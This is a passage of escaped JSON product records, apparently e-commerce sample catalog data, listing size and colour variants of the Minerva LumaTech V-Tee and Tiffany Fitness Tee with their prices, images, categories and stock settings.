_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws08-blue_back.jpg\",\"image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws08-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1441\":{\"sku\":\"WS08-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-L-Red\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1442\":{\"sku\":\"WS08-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-XL-Black\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"1443\":{\"sku\":\"WS08-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-XL-Blue\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws08-blue_back.jpg\",\"image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws08-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1444\":{\"sku\":\"WS08-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee-XL-Red\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"minerva-lumatech-trade-v-tee-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1445\":{\"sku\":\"WS08\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Minerva LumaTech&trade; V-Tee\",\"description\":\"<p>Don\'t be fooled by the simple design of our Minerva LumaTech&trade; V-Neck Tee. This classic training top features the same serious sweat-wicking technology as some of the more expensive tees in our lineup.<\\/p>\\n<p>&bull; Navy blue heather soft v-neck tee.<br \\/>&bull; Flatlock seams for chafe-free comfort.<br \\/>&bull; Relaxed cut.<br \\/>&bull; Ultra-lightweight fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=Cotton|Lycra&reg;,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WS08-XS-Black,size=XS,color=Black|sku=WS08-XS-Blue,size=XS,color=Blue|sku=WS08-XS-Red,size=XS,color=Red|sku=WS08-S-Black,size=S,color=Black|sku=WS08-S-Blue,size=S,color=Blue|sku=WS08-S-Red,size=S,color=Red|sku=WS08-M-Black,size=M,color=Black|sku=WS08-M-Blue,size=M,color=Blue|sku=WS08-M-Red,size=M,color=Red|sku=WS08-L-Black,size=L,color=Black|sku=WS08-L-Blue,size=L,color=Blue|sku=WS08-L-Red,size=L,color=Red|sku=WS08-XL-Black,size=XL,color=Black|sku=WS08-XL-Blue,size=XL,color=Blue|sku=WS08-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws08-blue_back.jpg\",\"image\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws08-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"Cotton|Lycra&reg;\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"1446\":{\"sku\":\"WS09-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-XS-Blue\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws09-blue_back.jpg\",\"image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1447\":{\"sku\":\"WS09-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-XS-Red\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1448\":{\"sku\":\"WS09-XS-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-XS-White\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-xs-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"White\"},\"1449\":{\"sku\":\"WS09-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness 